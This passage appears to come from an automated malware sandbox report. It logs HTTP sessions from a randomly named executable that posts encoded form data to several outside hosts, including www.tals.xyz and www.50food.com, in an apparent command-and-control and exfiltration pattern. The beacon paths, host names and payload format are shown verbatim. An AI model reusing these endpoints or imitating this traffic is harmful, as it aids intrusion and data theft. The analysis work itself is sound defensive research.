                                                                                          Data Ascii: 8z=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVXJ7WG9IFFhTeqR2/hVQ6wkHQdU20BbII00HH00R7vbStvIF5TRSd55+inqOJ6O1afdcsJ/1Z/ePluO3npy/3YxN04qYmQyVP16vNtjAHi4RhBLMgn9JubbjHlughhoeuWVpPesg3TMIwkOhe7Ui7HGVQtdn5E9X+5zGj+lwNY3unUcvdhyUfLuXM5K0YDLQ1gXGGKPLTvAGz7m7UrTK+BNzayOn1PKi9lo44abp2IIMuMnYoA8pC/I+xam1OSviIAB4PHNX/Wrt64Kr9n0jkKWXB3327STcrwxmhjlHjYlizxLAJPtYiv8BmVkusmEaTYZSd69avARiRSADhi13DpTDFkVYhSLN6e6MyBEiKU7sr+Sv9v7NzFEdvZ6Yu3/hwHAJO9Gcpwi1Fb7dvzmWqv9GyVQwZCZ7zzvP920bg+C/8E0VxQubI0eC2dIaaVvEIzELjQah4uzdWNzQ3Ewf+z5Wp+/yFGek/3gi1i/odfL7oaKlz69Cw1sxO+K/Bg0FNAnTNggQHNzq9Z8s1RpPN8Qo8Q2U3rOKLmNrPKTDyUw33A2b6uEJ2+L4feIKxX0gI0CYtVUNuiNqdNfn3l90+UhDurgoqBNcUuiVqPT3kArbB/CNeuctwWIFYHz92iSMtU+BhbkHjkej/6MexKnKnDpNGzcOeAGniQqyp/hW/wEJ6nMH+tmiExl1XftpcYO6WUJAc+XLCaDId6sTtnMdj/PVRZ/biM7H4ETjjYz5VB/l+Pj1HTBrlxY/hluJq5HAgsi65I3Mgv5c/Mm9ZL5VHAt6c6hV9RKV0Mlt8hUG21rJ4hY6OIt4QNDbRayzmIatuckU8T12Aip75W5YEzSp3giDnqwOda8+Gf42JH2lrPAjADJj+PjQ2wSB9FCgsXLPlOm5nJ0R+6+mmgdq9ICXXmAsv+HDWTQvXJsrWq/rp+U8gGmxY6IxABo3MaDLuirC18eK5PlIJ [TRUNCATED]
                                                                                          Nov 24, 2024 08:21:53.076112986 CET658INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:52 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.550004203.161.43.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:54.410326958 CET473OUTGET /6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:55.677627087 CET673INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:55 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.55000513.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:01.052650928 CET708OUTPOST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6f 56 72 77 57 45 30 4a 73 45 72 69 38 42 4e 50 76 37 67 48 4e 70 2f 77 6b 65 4c 72 44 56 47 30 4e 4a 74 36 2f 5a 45 4c 49 69 73 57 7a 67 35 76 52 4e 47 57 4f 74 75 4d 6b 64 79 31 51 63 71 39 6f 4c 6f 38 75 46 4b 5a 51 51 6a 31 76 6e 4d 6d 79 57 47 45 52 56 31 6b 52 47 50 39 50 57 2b 49 50 69 56 37 4d 4b 76 53 52 39 43 35 38 45 75 48 4f 69 71 75 64 31 50 4a 74 70 51 49 65 57 2f 63 74 6d 62 71 78 41 71 6d 49 61 4d 58 4b 32 44 75 34 67 31 52 57 43 77 6e 56 50 62 35 6b 75 34 39 59 42 41 33 7a 53 36 67 55 7a 70 37 31 56 50 54 52 4e 4e 66 49 78 61 67 74 6c 51 3d
                                                                                          Data Ascii: 8z=/Wn5zNWl0nSaoVrwWE0JsEri8BNPv7gHNp/wkeLrDVG0NJt6/ZELIisWzg5vRNGWOtuMkdy1Qcq9oLo8uFKZQQj1vnMmyWGERV1kRGP9PW+IPiV7MKvSR9C58EuHOiqud1PJtpQIeW/ctmbqxAqmIaMXK2Du4g1RWCwnVPb5ku49YBA3zS6gUzp71VPTRNNfIxagtlQ=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.55000613.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:03.747143030 CET728OUTPOST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 69 30 4e 73 4a 36 77 39 6f 4c 4a 69 73 57 34 41 35 32 66 74 47 4e 4f 74 69 71 6b 5a 36 31 51 59 43 39 6f 4b 59 38 74 79 65 61 43 51 6a 7a 69 48 4d 6b 74 6d 47 45 52 56 31 6b 52 47 72 62 50 57 57 49 50 53 6c 37 4d 72 76 64 66 64 43 36 31 6b 75 48 4b 69 71 71 64 31 50 4f 74 6f 38 75 65 55 48 63 74 6b 44 71 78 52 71 6e 47 61 4d 64 46 57 43 44 35 44 4d 42 51 6a 63 41 4a 4d 79 4c 33 59 49 54 51 58 78 64 70 77 79 49 48 54 46 44 6c 47 48 6b 41 39 73 32 53 53 4b 51 7a 79 46 52 54 57 4b 5a 73 45 45 2b 71 74 4a 79 35 74 2f 72 34 45 76 32
                                                                                          Data Ascii: 8z=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmi0NsJ6w9oLJisW4A52ftGNOtiqkZ61QYC9oKY8tyeaCQjziHMktmGERV1kRGrbPWWIPSl7MrvdfdC61kuHKiqqd1POto8ueUHctkDqxRqnGaMdFWCD5DMBQjcAJMyL3YITQXxdpwyIHTFDlGHkA9s2SSKQzyFRTWKZsEE+qtJy5t/r4Ev2


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.55000713.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:06.409101963 CET1745OUTPOST /cpgr/ HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.tals.xyz
                                                                                          Referer: http://www.tals.xyz/cpgr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 2f 57 6e 35 7a 4e 57 6c 30 6e 53 61 6e 55 62 77 52 58 4d 4a 71 6b 72 6a 35 42 4e 50 6b 62 67 44 4e 70 7a 77 6b 62 76 37 44 6d 71 30 4e 36 56 36 78 63 6f 4c 4b 69 73 57 37 41 35 7a 66 74 47 41 4f 73 4b 32 6b 5a 32 6c 51 61 4b 39 36 35 51 38 36 33 69 61 49 51 6a 7a 2b 33 4d 6c 79 57 48 4f 52 57 64 6f 52 47 62 62 50 57 57 49 50 55 4a 37 63 71 76 64 53 39 43 35 38 45 75 62 4f 69 71 43 64 31 58 42 74 6f 49 59 65 6c 6e 63 74 45 54 71 77 6a 53 6e 5a 71 4d 62 47 57 43 62 35 43 78 62 51 6a 41 62 4a 4d 32 68 33 66 6b 54 42 53 41 46 79 54 75 48 54 77 68 47 75 6c 44 34 53 6f 4d 52 4d 51 79 52 37 68 74 51 50 58 75 56 6b 42 51 74 72 63 49 51 39 70 57 34 30 41 57 4f 6b 39 66 55 63 49 4b 41 4f 69 6f 5a 41 32 64 6a 4c 39 38 2f 37 61 53 4e 57 67 6a 52 50 75 79 56 53 52 74 47 47 6e 4a 63 61 53 65 53 43 48 71 59 4b 4c 47 42 2b 72 77 57 73 72 49 4a 57 68 36 6f 67 37 53 4a 34 4f 48 68 76 6f 44 45 6a 72 69 77 37 58 53 73 4f 5a 78 4f 37 46 36 4e 46 31 30 45 44 6a 41 78 79 4c 75 4e 36 2f 63 49 6b 6d 4f 38 5a 34 36 [TRUNCATED]
                                                                                          Data Ascii: 8z=/Wn5zNWl0nSanUbwRXMJqkrj5BNPkbgDNpzwkbv7Dmq0N6V6xcoLKisW7A5zftGAOsK2kZ2lQaK965Q863iaIQjz+3MlyWHORWdoRGbbPWWIPUJ7cqvdS9C58EubOiqCd1XBtoIYelnctETqwjSnZqMbGWCb5CxbQjAbJM2h3fkTBSAFyTuHTwhGulD4SoMRMQyR7htQPXuVkBQtrcIQ9pW40AWOk9fUcIKAOioZA2djL98/7aSNWgjRPuyVSRtGGnJcaSeSCHqYKLGB+rwWsrIJWh6og7SJ4OHhvoDEjriw7XSsOZxO7F6NF10EDjAxyLuN6/cIkmO8Z46rOkp/PsObea8OcmhiQ6udesvJ1eTPGy5CFpWh6ObRAezJaURzY9Yrx6PMDU8ApmBS/8zpeyiRL5+9wmoHPXZisGP/U4XHG5fu6/SmkUgz1gT7NRWvins0cT/cUjOlDIzJLL+TNJY5tskGJ2wdxZ3p0IlpmLM1EIzJme9JgApV/0YGJrE0Ob7R8MzXcPB8Ho2bzRI1jaYQq1+vbfbaMTbLwubaKDUsfjY7ajvpJOydHxCPIskrPJREAQKgpeq5WefbpG3KYHTK+KJKSkKaJP0TH0Acz5BXZcZC+ATybYxxMrc5NpdUW8wDgq3fluEZ1AtUsdh06NJ5l/5gzJAtAFCp5lSYHO3ZvSX0DsqgD09a5lzCHWy9K3zGNEthnAoRByr7bJTILgBl8SoK/xdDdk4Q0Wrmf+Zr9uu/KDdb5koz5lo450KxLIeebdHZUpjbevltw6kv4KdmX6bKJqSIl6K81N85hphNthYdQWEBYeo7VXQ/ajMKkiFfJTv1fqMTcDRjCL+Hy2MPVh119cWXxwp0eDp4ppFi4B6szi5NnPdn6N3UpWEDTQv9XrQQFShadMonaVMbfWYueVWz14sn4tMG/6pPCfA4/tnlACELNQDJjbtEJVOZQLaG8QLFPm2a5NR6IDJpgZrWfPaxZx3ZOIONw300TDMgR/99y [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.55000813.248.169.48802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:09.076402903 CET468OUTGET /cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.tals.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:22:10.256428003 CET410INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Sun, 24 Nov 2024 07:22:10 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 270
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 7a 3d 79 55 50 5a 77 34 4f 39 36 6c 4b 52 67 55 44 69 4c 51 34 59 6a 67 57 65 78 30 5a 56 6a 4b 4e 55 56 72 33 48 71 6f 48 72 65 58 65 32 61 36 56 63 37 38 55 32 56 78 6f 58 34 56 55 4f 58 65 32 41 4b 4e 53 58 76 39 6d 73 52 4a 32 71 33 39 59 37 35 6c 7a 6a 4b 43 62 38 74 6e 41 61 72 67 47 76 61 58 5a 78 62 30 43 5a 4c 32 2f 57 55 44 49 64 4e 2f 75 6c 62 70 79 33 32 56 47 44 50 6a 37 53 46 51 3d 3d 26 61 66 77 58 61 3d 36 6e 6e 48 51 6c 6b 70 72 52 49 4c 45 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.550009147.255.21.187802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:15.804099083 CET714OUTPOST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 50 6d 79 50 61 77 69 38 50 4c 75 4b 42 59 31 47 6d 6b 59 39 78 70 2b 30 63 68 64 64 35 68 57 54 56 67 4d 63 55 2f 51 59 45 4a 57 32 70 49 58 34 53 4d 44 2b 4c 45 46 6e 38 79 43 47 67 6a 53 48 52 5a 79 68 34 70 51 5a 43 4c 5a 6c 45 42 72 74 73 41 55 67 48 32 45 72 75 4e 5a 78 6f 61 52 6c 4c 50 77 79 48 54 6a 67 77 32 2f 56 79 62 62 6a 4a 48 42 65 77 43 6f 55 64 55 33 32 47 2f 6b 51 54 51 37 57 53 67 66 36 67 59 4f 64 33 6f 32 67 53 7a 34 67 74 62 50 6b 4c 65 53 37 6c 4a 32 44 5a 4a 6a 54 6a 62 2f 57 6c 46 51 38 54 49 71 76 47 68 61 65 32 4a 6d 2b 4b 76 77 3d
                                                                                          Data Ascii: 8z=bo4LrJQp5WjRPmyPawi8PLuKBY1GmkY9xp+0chdd5hWTVgMcU/QYEJW2pIX4SMD+LEFn8yCGgjSHRZyh4pQZCLZlEBrtsAUgH2EruNZxoaRlLPwyHTjgw2/VybbjJHBewCoUdU32G/kQTQ7WSgf6gYOd3o2gSz4gtbPkLeS7lJ2DZJjTjb/WlFQ8TIqvGhae2Jm+Kvw=
                                                                                          Nov 24, 2024 08:22:17.015028000 CET309INHTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:11 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.550010147.255.21.187802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:18.470232010 CET734OUTPOST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 62 6f 34 4c 72 4a 51 70 35 57 6a 52 41 6d 43 50 63 58 2b 38 4a 72 75 4a 45 59 31 47 74 45 5a 56 78 70 79 30 63 67 59 57 35 54 69 54 56 42 38 63 47 72 38 59 42 4a 57 32 6e 6f 57 77 63 73 44 35 4c 45 5a 56 38 7a 2b 47 67 6a 47 48 52 61 6d 68 34 34 51 65 43 62 5a 6e 4d 68 72 72 69 67 55 67 48 32 45 72 75 4e 4d 61 6f 62 31 6c 4b 38 59 79 47 78 4c 6a 73 6d 2f 53 7a 62 62 6a 65 33 42 61 77 43 6f 36 64 56 37 63 47 35 67 51 54 56 2f 57 54 78 66 35 75 59 4f 48 35 49 33 48 55 6d 4e 61 33 62 44 62 44 38 4f 6d 38 71 53 63 59 2f 53 35 35 35 33 2b 32 6c 38 45 44 62 69 59 58 52 37 33 73 71 32 4f 55 34 6c 79 51 6a 30 71 39 58 68 71 4a 35 51 33 6b 42 43 57 44 58 64 52
                                                                                          Data Ascii: 8z=bo4LrJQp5WjRAmCPcX+8JruJEY1GtEZVxpy0cgYW5TiTVB8cGr8YBJW2noWwcsD5LEZV8z+GgjGHRamh44QeCbZnMhrrigUgH2EruNMaob1lK8YyGxLjsm/Szbbje3BawCo6dV7cG5gQTV/WTxf5uYOH5I3HUmNa3bDbD8Om8qScY/S5553+2l8EDbiYXR73sq2OU4lyQj0q9XhqJ5Q3kBCWDXdR
                                                                                          Nov 24, 2024 08:22:19.677481890 CET309INHTTP/1.1 403 Forbidden
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:22:14 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 166
                                                                                          Connection: close
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.550011147.255.21.187802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:22:21.132108927 CET1751OUTPOST /u9hy/ HTTP/1.1
                                                                                          Host: www.50food.com
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.50food.com
                                                                                          Referer: http://www.50food.com/u9hy/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
